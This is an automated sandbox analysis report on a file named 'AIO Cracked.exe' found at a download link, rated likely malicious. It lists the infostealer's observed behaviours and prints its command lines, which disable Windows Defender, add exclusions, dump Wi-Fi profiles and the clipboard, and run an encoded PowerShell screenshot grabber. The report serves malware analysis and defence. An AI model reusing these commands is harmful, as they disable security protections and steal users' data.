Analysis Overview
Threat Level: Likely malicious
The file https://pixeldrain.com/l/fXxFweL2 was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
UPX packed file
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates physical storage devices
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Kills process with taskkill
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Gathers system information
Enumerates system info in registry
Checks SCSI registry key(s)
Detects videocard installed
Enumerates processes with tasklist
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-19 08:33
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-19 08:33
Reported
2024-05-19 08:34
Platform
win10v2004-20240426-en
Max time kernel
69s
Max time network
66s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\AIO\AIO Cracked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AIO Cracked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â rar.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.sfx.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\AIO\AIO Cracked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AIO Cracked.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â rar.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\AIO\Config\update.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\AIO\Config\scvhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.sfx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Anarchy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Anarchy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI11082\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133605812110920486" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://pixeldrain.com/l/fXxFweL2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe8b8ab58,0x7fffe8b8ab68,0x7fffe8b8ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1748,i,12461174325073497144,10764383007510972064,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1748,i,12461174325073497144,10764383007510972064,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2200 --field-trial-handle=1748,i,12461174325073497144,10764383007510972064,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3004 --field-trial-handle=1748,i,12461174325073497144,10764383007510972064,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3052 --field-trial-handle=1748,i,12461174325073497144,10764383007510972064,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4472 --field-trial-handle=1748,i,12461174325073497144,10764383007510972064,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 --field-trial-handle=1748,i,12461174325073497144,10764383007510972064,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4960 --field-trial-handle=1748,i,12461174325073497144,10764383007510972064,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap23112:68:7zEvent22984
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Users\Admin\Downloads\AIO\AIO Cracked.exe
"C:\Users\Admin\Downloads\AIO\AIO Cracked.exe"
C:\Users\Admin\AppData\Local\Temp\AIO Cracked.exe
"C:\Users\Admin\AppData\Local\Temp\AIO Cracked.exe"
C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â rar.exe
"C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â rar.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B68E.tmp\B68F.tmp\B690.bat "C:\Users\Admin\AppData\Local\Temp\AIO Cracked.exe""
C:\Users\Admin\Downloads\AIO\Config\update.exe
Config\update.exe
C:\Users\Admin\Downloads\AIO\Config\scvhost.exe
Config\scvhost.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.sfx.exe
Anarchy.sfx.exe -pWqb0BjPDJdn:Lp
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Anarchy.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Anarchy.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Anarchy.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Anarchy.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\Anarchy.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\Anarchy.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKA